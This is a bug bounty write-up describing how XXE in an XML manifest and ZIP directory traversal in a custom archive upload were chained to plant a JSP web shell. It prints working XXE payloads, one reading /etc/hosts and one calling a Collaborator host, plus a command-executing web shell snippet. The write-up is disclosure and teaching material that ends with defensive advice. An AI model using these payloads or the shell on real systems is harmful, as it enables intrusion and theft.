A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell

ยท 1578 words ยท 8 minute read

XML and ZIP - A Tale as Old As Time ๐Ÿ”—

While researching a bug bounty target, I came across a web application that processed a custom file type. Let’s call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Here’s a quick overview of these “vulnerable features.”

XML External Entities ๐Ÿ”—

The XML file format supports external entities, which allow an XML file to pull data from other sources, such as local or remote files. In some cases this can be useful because it makes importing data from various sources more convenient. However, in cases where an XML parser accepts user-defined inputs, a malicious user can pull data from sensitive local files or internal network hosts.

As the OWASP Foundation wiki states:

This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser… Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.

Just like in my previous Remote Code Execution writeup, developers are put at risk by vulnerable defaults.

ZIP Directory Traversal ๐Ÿ”—

Although ZIP directory traversal has been exploited since the format’s inception, this attack vector gained prominence in 2018 due to Snyk’s clumsily-named “Zip Slip” research/marketing campaign that found the vulnerability in many popular ZIP parser libraries.

An attacker can exploit this vulnerability with a ZIP file that contains directory traversal filenames such as ../../../../evil1/evil2/evil.sh. When a vulnerable ZIP library tries to unzip this file, rather than unzipping evil.sh to a temporary directory, it unzips it to another location in the filesystem defined by the attacker (in this case, /evil1/evil2). This can easily lead to remote code execution if an attacker overwrites a cron job script or creates a web shell in the web root directory.

Similar to XXEs, ZIP directory traversal is especially common in Java:

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand-crafted and shared among developer communities such as StackOverflow.

Discovering the XXE ๐Ÿ”—

Now that we have the theoretical foundations of the attack, let’s move on to the actual vulnerability in practice. The application accepted uploads of the custom file type, unzipped them, parsed the XML manifest file, and returned a confirmation page with the manifest details. For example, if mypackage.xyz was a ZIP file containing the following manifest.xml:

<?xml version="1.0"?>
    <title>My Awesome Package</title>
    <author>John Doe</author>

I would get the following confirmation screen:

Package Info 1

The first thing I did was test for XSS. One tip about injecting XSS via XML is that XML doesn’t support raw <htmltags> because this gets interpreted as an XML node, so you have to escape them in the XML like &lt;htmltags&gt;. Unfortunately, the output was sanitized properly.

The next move was to test for XXEs. Here, I made a mistake and began by testing for a remote external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'https://mycollab.burpcollaborator.net'>]>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>

I didn’t get a pingback on my Burp Collaborator instance and immediately assumed XXEs were blocked. This is a mistake because you should always test incrementally, starting with non-system external entities, working your way up to local files, and then remote files. This helps you eliminate various possibilities along the way. After all, a standard firewall rule would block outgoing web connections, causing a remote external entity to fail. However, this does not necessarily mean local external entities are blocked.

Fortunately, I decided to try again later with a local external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'file:///etc/hosts'>]>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>

That’s when I struck gold. The contents of /etc/hosts appeared in the confirmation page.

Package Info 2

Pivoting to RCE ๐Ÿ”—

Typically in a white hat hacking scenario, you stick to a non-destructive proof-of-concept and stop there. With the XXE, I could expose local database files and several interesting web logs that included admin credentials. This was sufficient to write up a report.

However, there was another vulnerability I wanted to test: the ZIP parser. Remember that the app unzipped the package, read the manifest.xml file, and returned a confirmation page. I found an XXE in the second step, suggesting that there might be additional vulnerabilities in the rest of the flow.

To test for ZIP directory traversal, I used evilarc, a simple Python 2 script to generate ZIP files with directory traversal payloads. I needed to figure out where I wanted to place my traversal payload in the local file system. Here, the XXE helped. Local external entities support not just files but also directories, so if I used an external entity like file:///nameofdirectory, instead of the contents of a file, it would list the contents of the directory.

With a little digging through the directories, I eventually came across a file located at /home/web/resources/templates/sitemap.jsp. Its contents matched a page in the application - https://vulnapp.com/sitemap. I zipped the contents of the sitemap page along with a web shell as ../../../../../../home/web/resources/templates/sitemap.jsp in my package. I kept the web shell hidden via a secret URL parameter to prevent casual users from accidentally coming across it:

<%@ page import="java.util.*,java.io.*"%>
    if (request.getParameter("spaceraccoon") != null) {
        out.println("Command: " + request.getParameter("spaceraccoon") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("spaceraccoon"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            disr = dis.readLine(); 

I uploaded my package, browsed to https://vulnapp.com/sitemap?spaceraccooon=ls and… nothing. The page looked exactly the same.

A common saying goes:

The definition of insanity is doing the same thing over and over again and expecting a different result.

This does not apply to black box testing. Latency, caching, and other quirks of the web can return different outputs for the same input. In this case, the server had cached the original version of https://vulnapp.com/sitemap, which is why it initially returned the page without my web shell. After several refreshes, my web shell kicked in, and the page returned the contents of the web root directory along with the rest of the sitemap page contents. I was in.

Convention over Configuration ๐Ÿ”—

Configuration Meme

From the writeup, you might have noticed that I was dealing with a Java application. This brings us back to OWASP and Snyk’s warnings that Java is uniquely prone to mishandling XML and ZIP files. Due to a combination of unsafe defaults and a lack of default parsers, developers are forced to rely on random Stack Overflow snippets or third-party libraries.

However, Java is not the only culprit. Mishandling XML and ZIP files occurs across all programming languages and frameworks. Developers are expected to go out of their way to configure third-party libraries and APIs safely, which makes it easy to introduce vulnerabilities into an application. A developer only needs to make one mistake to introduce a vulnerability in their application. The probability of this increases with every additional “black box” library.

One approach to reduce vulnerabilities in development is Spotify’s “Golden Path”:

At Spotify, one of our engineering strategies is the creation and promotion of the use of “Golden Paths.” Golden Paths are a blessed way to build products at Spotify. They consist of a set of APIs, application frameworks, best practices, and runtime environments that allow Spotify engineers to develop and deploy code safely, securely, and at scale. We complement these with opt-in programs that help increase quality. From our bug bounty program reports, we’ve found that the more that development adheres to a Golden Path, the less likely there is to be a vulnerability reported to us.

This boils down to a simple Ruby on Rails maxim: “Convention over configuration.”

Rather than relying on thousands of engineers to individually remember all the quirks of web application security, it is a lot more efficient to focus on a battle-tested set of frameworks and APIs and reduce the need to constantly tweak these settings.

Fortunately, organizations can solve this in a systemic manner by adhering to convention over configuration.

Major thanks to the security team behind the bug bounty program, who fixed the vulnerability in less than 12 hours and gave the go-ahead to publish this writeup.